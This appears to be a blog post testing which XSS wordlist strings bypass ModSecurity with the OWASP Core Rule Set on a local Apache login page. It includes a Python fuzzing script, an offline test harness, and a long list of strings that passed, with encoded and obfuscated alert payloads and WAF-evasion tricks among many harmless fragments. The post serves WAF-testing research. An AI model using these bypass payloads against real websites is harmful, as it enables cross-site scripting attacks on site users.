Mod_security Bypass for XSS
I wanted to do some research in the cybersecurity domain that piqued my interest. I decided to test which XSS strings from the FuzzDB and SecLists wordlists get past ModSecurity running the OWASP Core Rule Set (CRS) on a standard Apache2 web server. I used the code shown below:
#!/usr/bin/env python
"""
Test for mod_security bypass.
"""
# Standard Python libraries.
import requests

# One candidate string per line (the combined FuzzDB and SecLists XSS lists).
with open('/root/projects/fuzzdb.txt') as f:
    content = f.read().splitlines()

results = {}  # candidate string -> HTTP status code (keys are unique, so exact repeats are sent once)
url = 'http://127.0.0.1/login2.php'
for x in content:
    # Inject the candidate into the username field; the password is a dummy value.
    payload = {'username': x, 'password': '1'}
    r = requests.post(url, data=payload)
    results[x] = r.status_code

# 200 means the request reached the login script; a request blocked by the WAF gets a 403.
for k, v in results.items():
    if v == 200:
        print(k)
        print('----------------------------------------------')
I combined all the separate XSS lists from FuzzDB and SecLists into one file and ran every entry against the username parameter of a quick PHP login script I picked up for testing. As the Python code above shows, the script prints each string that received a 200 response from Apache2, which means the request was not blocked by the WAF; a blocked request gets a 403 Forbidden instead. Two caveats apply when reading the results. A 200 only shows that ModSecurity let the request through, not that the string is reflected on the page or that it executes. And because the script sends the wordlists line by line, entries that span several lines in the source files arrive as separate fragments, so some of the strings listed below are harmless pieces of a larger payload rather than working vectors on their own.
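The harness below is an added example, not the script from the original post. It keeps the same idea (POST each wordlist entry into the username field of http://127.0.0.1/login2.php and treat a 403 as a WAF block) but also records whether the string came back verbatim in the response body, so "the WAF let it through" and "the page reflects it unencoded" are reported as separate verdicts, and it skips comment lines such as "# credit to rsnake". The demo_sender function and its three regex patterns are a constructed stand-in for the WAF and login page so the example runs offline; they are not the OWASP CRS rules. The field names, the fixed dummy password and the verdict labels are my assumptions.

```python
#!/usr/bin/env python3
"""
Added example (not the original post's script): POST each wordlist entry
into one form field, then classify the result.

Assumptions (mine, not from the original page): the login script answers
200 for any credentials and echoes the submitted username; ModSecurity
answers 403 when a rule blocks the request; wordlist comment lines start
with '#'.
"""
import collections
import html
import re

BLOCKED = "blocked"                # 403 from ModSecurity
PASSED = "passed"                  # 200 and the string appears verbatim in the body
PASSED_ENCODED = "passed-encoded"  # 200 but the string was altered (e.g. HTML-escaped)
OTHER = "other"                    # anything else (500, redirect, ...)


def load_wordlist(text):
    """Split a wordlist into candidate strings, dropping blank and '#' lines."""
    out = []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        out.append(line)
    return out


def classify(status_code, body, payload):
    """Map one response to a verdict. 200 alone only proves the WAF did not block."""
    if status_code == 403:
        return BLOCKED
    if status_code == 200:
        return PASSED if payload in body else PASSED_ENCODED
    return OTHER


def run(payloads, send):
    """Send every distinct string once; send(payload) -> (status_code, body)."""
    results = collections.OrderedDict()
    for p in payloads:
        if p in results:  # exact repeats (same bytes) are sent only once
            continue
        status, body = send(p)
        results[p] = classify(status, body, p)
    return results


def summarize(results):
    """Count verdicts, e.g. {'blocked': 3, 'passed': 2, 'passed-encoded': 1}."""
    return dict(collections.Counter(results.values()))


def requests_sender(url, field, session=None):
    """Build a send() that POSTs the candidate into `field` with a dummy password."""
    import requests  # imported here so the offline demo does not need it installed
    s = session or requests.Session()

    def send(payload):
        r = s.post(url, data={field: payload, "password": "1"}, timeout=10)
        return r.status_code, r.text
    return send


# Constructed stand-in for WAF + login page so the harness runs offline.
# These patterns are illustrative only, NOT the OWASP CRS rules.
_DEMO_RULES = re.compile(r"<script|onerror\s*=|javascript:", re.IGNORECASE)


def demo_sender(payload):
    """Fake target: 403 on a rule hit, otherwise 200 with the username HTML-escaped."""
    if _DEMO_RULES.search(payload):
        return 403, "<h1>Forbidden</h1>"
    return 200, "<p>Unknown user: %s</p>" % html.escape(payload, quote=True)


if __name__ == "__main__":
    # Constructed sample wordlist; swap demo_sender for
    # requests_sender("http://127.0.0.1/login2.php", "username") to hit a real target.
    sample = ("# credit to rsnake\n<script>alert(1)</script>\nalert(1)\n"
              "&#x61;lert(1)\n<br><br>\nalert(1)\n")
    res = run(load_wordlist(sample), demo_sender)
    for candidate, verdict in res.items():
        print("%-16s %s" % (verdict, candidate))
    print(summarize(res))
```

Against the demo target, `alert(1)` is reported as passed (the WAF let it through and the page echoes it unchanged), while `&#x61;lert(1)` and `<br><br>` are passed-encoded: the WAF let them through, but the page HTML-escaped them, so a 200 on its own would have overstated the result.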
Please see my GitHub for all code related to this project.
If there are issues with accessing my GitHub repo, I have a zipped file with my code, model, and datasets here: Repo Copy
These are the XSS strings that were allowed to pass through the ModSecurity WAF, exactly as the script printed them (one entry per dashed separator):
'
----------------------------------------------
"
----------------------------------------------
&#x61;lert(1)
----------------------------------------------
&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
----------------------------------------------
&amp;#39;XSS')>
----------------------------------------------
'); alert('XSS
----------------------------------------------
\";alert('XSS');//
----------------------------------------------
alert
----------------------------------------------
alert&lpar;1&rpar;
----------------------------------------------
alert(1)
----------------------------------------------
alert\\`1\\`
----------------------------------------------
alert`1`
----------------------------------------------
http://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/attack/xss/test.xxe
----------------------------------------------
https://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/attack/xss/test.xxe
----------------------------------------------
PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
----------------------------------------------
//%0D%0A%0D%0A//
----------------------------------------------
setTimeout(location.search.slice(1));
----------------------------------------------
\'-alert(1)//
----------------------------------------------
<br><br><br><br><br><br><br><br><br><br>
----------------------------------------------
<br><br><br><br><br><br><x id=x>#x
----------------------------------------------
alert`1`
----------------------------------------------
alert&lpar;1&rpar;
----------------------------------------------
alert&#x28;1)
----------------------------------------------
alert&#40;1)
----------------------------------------------
(alert)(1)
----------------------------------------------
a=alert,a(1)
----------------------------------------------
[1].find(alert)
----------------------------------------------
top["al"+"ert"](1)
----------------------------------------------
top[/al/.source+/ert/.source](1)
----------------------------------------------
al\u0065rt(1)
----------------------------------------------
top['al\145rt'](1)
----------------------------------------------
top['al\x65rt'](1)
----------------------------------------------
top[8680439..toString(30)](1)
----------------------------------------------
navigator.vibrate(500)
----------------------------------------------
# credit to rsnake
----------------------------------------------
\";alert('XSS');//
----------------------------------------------
>>> vectors()
----------------------------------------------
<head>
----------------------------------------------
@font-face{font-family:y;src:url("font.svg#x") format("svg");}body{font:100px "y";}
----------------------------------------------
</head>
----------------------------------------------
<body>Hello</body>
----------------------------------------------
onerror CDATA "alert(67)"
----------------------------------------------
onload CDATA "alert(2)">
----------------------------------------------
<div id="91">[A]
----------------------------------------------
[B]
----------------------------------------------
[C]
----------------------------------------------
[D]
----------------------------------------------
<feImage>
----------------------------------------------
PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D"/>
----------------------------------------------
</feImage>
----------------------------------------------
*{color:gre/**/en!/**/important} /* IE 6-9 Standards mode */
----------------------------------------------
*{background:url(xx:x//**/\red/*)} /* IE 6-7 Standards mode */
----------------------------------------------
<a id="x"><rect fill="white" width="1000" height="1000"/></a>
----------------------------------------------
<div id="113"><div id="x">XXX</div>
----------------------------------------------
#x{font-family:foo[bar;color:green;}
----------------------------------------------
#y];color:red;{}
----------------------------------------------
<div id="116"><div id="x">x</div>
----------------------------------------------
<xml:namespace prefix="t">
----------------------------------------------
<div id="117"><a href="http://attacker.org">
----------------------------------------------
<h1>Drop me</h1>
----------------------------------------------
</div>
----------------------------------------------
function makePopups(){
----------------------------------------------
for (i=1;i<6;i++) {
----------------------------------------------
window.open('popup.html','spam'+i,'width=50,height=50');
----------------------------------------------
}
----------------------------------------------
}
----------------------------------------------
<body>
----------------------------------------------
</body>
----------------------------------------------
<div id="123"><span class=foo>Some text</span>
----------------------------------------------
<a class=bar href="http://www.example.org">www.example.org</a>
----------------------------------------------
alert('foo');
----------------------------------------------
});
----------------------------------------------
alert('bar');
----------------------------------------------
<!ATTLIST xsl:stylesheet
----------------------------------------------
id ID #REQUIRED>]>
----------------------------------------------
</xsl:template>
----------------------------------------------
<circle fill="red" r="40"></circle>
----------------------------------------------
Same effect with
----------------------------------------------
<math>
----------------------------------------------
<div id="131"><b>drag and drop one of the following strings to the drop box:</b>
----------------------------------------------
<br/><hr/>
----------------------------------------------
<label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label>
----------------------------------------------
<br>
----------------------------------------------
<input name="secret" type="password">
----------------------------------------------
</image>
----------------------------------------------
<div id="134"><xmp>
----------------------------------------------
<%
----------------------------------------------
</xmp>
----------------------------------------------
x='<%'
----------------------------------------------
alert(2)
----------------------------------------------
XXX
----------------------------------------------
<eval>new ActiveXObject(&apos;htmlfile&apos;).parentWindow.alert(135)</eval>
----------------------------------------------
<if expr="new ActiveXObject('htmlfile').parentWindow.alert(2)"></if>
----------------------------------------------
</template>
----------------------------------------------
<input name="username" value="admin" />
----------------------------------------------
<input name="password" type="password" value="secret" />
----------------------------------------------
<input name="injected" value="injected" dirname="password" />
----------------------------------------------
<input type="submit">
----------------------------------------------
<circle r="400"></circle>
----------------------------------------------